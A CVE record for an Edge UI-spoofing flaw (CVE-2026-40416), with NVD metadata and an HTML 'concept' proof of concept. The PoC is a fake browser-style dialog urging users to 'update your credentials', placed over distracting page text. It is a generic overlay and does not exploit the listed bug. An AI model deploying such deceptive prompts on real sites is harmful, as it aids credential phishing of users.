CVE-2026-40416

<!-- PoC for UI Spoofing Concept This script demonstrates how an attacker might overlay a fake UI element. --> <!DOCTYPE html> <html> <head> <style> /* Overlay styling to mimic browser UI */ .fake-dialog { position: fixed; top: 10px; right: 10px; background: #f1f1f1; border: 1px solid #ccc; padding: 10px; box-shadow: 2px 2px 5px rgba(0,0,0,0.2); z-index: 9999; font-family: sans-serif; width: 300px; } .fake-btn { background: #0078d4; color: white; border: none; padding: 5px 10px; margin-left: 10px; cursor: pointer; } </style> </head> <body> <div class="fake-dialog"> <p>Security Alert: Please update your credentials.</p> <button class="fake-btn">Update</button> <button onclick="this.parentElement.style.display='none'">Ignore</button> </div> <p>Regular website content here to distract user...</p> </body> </html>

{"cve": {"id": "CVE-2026-40416", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:19.687", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40416", "source": "[email protected]"}]}}